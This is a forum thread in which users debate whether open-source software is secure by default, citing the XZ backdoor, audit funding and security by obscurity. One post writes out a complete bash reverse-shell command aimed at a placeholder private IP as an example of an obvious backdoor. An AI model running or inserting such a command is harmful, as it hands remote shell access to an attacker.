How do we combat the "FOSS == security" belief?

gamma7

This one needs no introduction. Way too many people in FOSS community ( especially in Linux community ) believe that something is secure just because it's FOSS when that is clearly not true.

Linux community goes one step further, with people claiming that Linux is secure because of it's smaller marketshare ( and supposedly thus smaller targeting) compared to the other operating systems.The phrase "given enough eyes, all bugs are shallow" is something people have too much confidence in, as proven by XZ backdoor incident, where we got lucky that someone noticed a slowdown. No one knew what was happening before that for more than 2 years.

These are dangerous misconceptions, because it leads to a complete disregard for security, while people are gaslighting each other into thinking something is secure while it's not. This puts users at greater risk of being hacked.

Whenever people are criticized for their security practices, they are always hostile towards cybersecurity resarchers and attack them, while spreading misinformation. A great example of this is F-Droid, or Linus' response to criticisms of his kernel security. Trying to spread awareness just leads to harassement towards crybersecurity researchers and pointless fighting.

Is there any chance that people stop believing in this? How did they not learn anything from XZ backdoor?

Eumenia

gamma7 ttack them, while spreading misinformation. A great example of this is F-Droid

The linked Pull Request is about people saying that F-Droid display's to much permissions

gk7ncklxlts99w1

gamma7

believe that something is secure just because it's FOSS when that is clearly not true

When it comes to discussions like "many people believe x", I always wonder, how do you know what they believe? Are you inferring their beliefs from brief tidbits you've read in online discussions, or have you conducted an online survey asking people about their beliefs?

"Many people believe using VPNs is a silver bullet"
"Many people believe using incognito mode makes you completely anonymous, private and secure"
"Many people think privacy and security are the same thing"

Except...no, they don't. I haven't seen anyone who really believes any of these things. I've seen plenty of garbage "10 privacy/security myths debunked" articles, and pretend experts like OccupyTheWeb talk about VPNs as if they're ubiquitously used for "keeping the hackers away" and that they're inherently unsafe because they don't do that. It's FUD masquerading as fact-checking.

people claiming that Linux is secure because of it's smaller marketshare

I don't know who is saying this, but "secure" in this scenario is a bit of a misnomer. Obscure is a better term. Security by obscurity gets a bad rap in the infosec community, but it is valid when used alongside other defensive strategies. Linux having a small market share is its primary defense against widespread malware. Targeted/spearphishing malware is a different issue. You can argue about its many vulnerabilities, but all this does is confuse people with technical jargon, and lead them into thinking the opposite is true, that it is inherenly insecure. It leads people to go in the opposite direction, it doesn't lead to a better, sophisticated understanding.

as proven by XZ backdoor incident

I don't think it is reasonable to assume the phrase "given enough eyes, all bugs are shallow" is nullified by this incident. Also, it wasn't a bug, it was an advanced persistent threat.

Whenever people are criticized for their security practices, they are always hostile towards cybersecurity resarchers and attack them

I've seen this play out a lot. Here's an example of a researcher giving a very in depth review of Matrix, with feedback from a Matrix dev/team member. It's extremely difficult to read a discussion like this, especially when you don't have the relevant expertise, and come away with anything other than a biased, one sided, misinterpreted take on the situation. Unfortunately people do come away with their own opinions, and write about it in a convincing manner, even if they have no clue what they're reading, but "it's extremely comprehensive so it must be true". It's the complexity bias.

I am much more discerning of information coming from people who accuse others of FUD and malice, because in my experience, that's where most of the FUD and malice comes from.

I trust FOSS more than monetized, closed source programs. Trust is not equivalent to "assuming secure", it means it's better than the alternative, at the very least.

DeletedUser685

Most open source projects are hobby level efforts run by a single developer, a small group of contributors, or a non profit organization. They usually don't have the budget to hire a dedicated cybersecurity firm to audit their code. The main exceptions are for-profit companies that release open-source clients, think Mullvad, Proton, Brave. If nobody gets paid to audit the code, it won't be properly reviewed - plain and simple. The community can only spot obvious backdoors, like /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1
The more contributors a project has, the easier it can be for insecure code to slip in. Compare that to a typical commercial company with closed-source software: you have to clear many hiring stages, study internal docs on how to commit code, get your changes reviewed by a tech lead, and then push them to production. If you mess up, you risk getting fired. In open-source, all you really need is a GitHub account.

blissartt

Software CAN be more secure because it's FLOSS.

It's absolutely NOT more secure a priori just because it's FLOSS. Not a chance.

n3t_admin

While I agree, the argument goes both ways.

What I mean by that, is the ginormous amount of closed source software that relies on FOSS software to exist. Check out how many libraries, binaries and so on in Windows or macOS rely on FOSS projects. Do you think they audit all of them? I highly doubt it.
XZ backdoor could happen just like that with major closed source software too. It was just more profitable to exploit XZ utils due to the potential access to millions of servers, this time.

littlerack

Dunno if that's a replica of an earlier text, but I think it was already covered very long time ago https://ulveon.net/p/2025-12-03-the-secure-open-source-fallacy/

Johnnyloans

gk7ncklxlts99w1
Well said.

I always wonder, how do you know what they believe?

exactly

Whenever people are criticized for their security practices, they are always hostile

Astonishing statement. I originally didn't get this far into the OP.

This quote reminds me of a guy i knew with zero self-awareness--abysmal social skills. Anyway, he is taking a lady on a date driving her around town. She says that she's growing wary. "just 1 more museum," he assures. 4 stops later and the night is growing old--She is pissed.
I could have given him 5 guesses as to why and he wouldn't be close haha. Actually, all of this guesses would somehow portray him as the victim and she's just [insert word here].

My point is: if everyone you meet is "always hostile" maybe you come off too adamantly or condescendingly.

People that don't recognize nuance in the world are usually wrong--pushing one side and minimizing the other.
We are in a forum that would likely push the view: "Throw away your high heels ladies. Adding just 1 inch--2.5cm--to flats increases ankle injuries by 20,000%. Your bones will break soon--heels aren't best practice."

Isn't microslop in the news twice a month for a fatal bug in M365 or W11?
But we put the magnifying glass to the single, biggest FLOSS story of the century as an example of the quality we can expect of most--unrelated--FLOSS projects.

Compare that to a typical commercial company with closed-source software: you have to clear many hiring stages, study internal docs on how to commit code, get your changes reviewed by a tech lead, and then push them to production.

Tens of thousands of company engineers that went through a rigorous hiring process contribute to FLOSS. Pull requests aren't unique to CS.

gamma7

I apologize if I have put any misinformation or FUD.
And I probably didn't word my post well enough.

gk7ncklxlts99w1 When it comes to discussions like "many people believe x", I always wonder, how do you know what they believe? Are you inferring their beliefs from brief tidbits you've read in online discussions, or have you conducted an online survey asking people about their beliefs?

I didn't want to generalize, this is just from what I saw from online discussions. You're right.

Johnnyloans My point is: if everyone you meet is "always hostile" maybe you come off too adamantly or condescendingly

I should've phrased my post better. People aren't always hostile, but they tend to push their own agenda despite usually not having expertise like researchers do. And it's probably just a loud minority.
I'm not saying everyone is like this.

Johnnyloans

gamma7 I apologize

You're all good dude. Nothing against you. I'm still growing each day myself, hopefully into a big boy.

fuyuka I think it's more important to stop trying to persuade people about things they blindly believe in and instead take the time to invest in truly important resources. Persuasion is something you do when people are ready to listen.

Great point

fuyuka

There is absolutely no reason to waste time on such stories. Do not forget what is important.

Most users are more likely to simply want to accept information as it is. They want to accept it as evil if it's evil, and as good if it's good. The most important thing I consider is that it's more crucial to quickly improve the parts that people actually find inconvenient and guide them to use it naturally as needed.

For example, if you can protect your PGP private key well on your own, you shouldn't rely on Proton. But without that confidence, there's no platform that protects your private PGP key better than any email service.
Of course, I would use mailbox and anonaddy. I believe I can keep my private key safe myself. but, What about other people? How many truly understand PGP? They'd probably just toss it out the window because it's too inconvenient...

Yesterday, I watched a debate between someone who believes a specific incident occurred and someone who denies everything, claiming it didn't happen. Both sides were merely locked in a battle of swords and shields, each wielding flawed facts. Even if you try to correct their facts, they will only deny them or come up with another excuse. One side tried to deny even their own incompetence in preventing that incident, while the other insisted it must have happened without any evidence whatsoever.
I think it's more important to stop trying to persuade people about things they blindly believe in and instead take the time to invest in truly important resources. Persuasion is something you do when people are ready to listen.